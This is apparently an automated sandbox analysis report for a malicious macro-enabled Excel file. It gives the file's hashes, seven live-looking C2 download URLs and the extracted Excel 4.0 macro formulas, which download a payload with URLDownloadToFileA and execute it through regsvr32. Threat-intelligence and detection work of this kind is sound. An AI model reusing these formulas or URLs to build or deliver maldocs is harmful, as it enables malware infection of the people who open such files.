General

  • Target

    40bbb2b5801af72d5d40bd204db7f0241dc6f51091b11a169cc1c84cc2a33757

  • Size

    35KB

  • MD5

    e7285266d8dbe9463f18b841db473141

  • SHA1

    0427a60eac048166ca78011ab69a6012f67109db

  • SHA256

    40bbb2b5801af72d5d40bd204db7f0241dc6f51091b11a169cc1c84cc2a33757

  • SHA512

    912477c714e6ad5c241c6128ced34c338d98063d0db6a2bc89225d0710322ea0ef90bcd12fdf8fb51e8cc4d3526502c9126a8bcdb50e02594b7ea7a1c4440e82

  • SSDEEP

    768:xsmn9tnd5euAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooofS:xFtndguUOZZ1ZYpoQ/pMA6Kt

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/

https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/

https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/

https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/

https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/

https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/

https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/","..\xdha.ocx",0,0)
    =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C28<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx")
    =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 40bbb2b5801af72d5d40bd204db7f0241dc6f51091b11a169cc1c84cc2a33757
    .xlsm office2007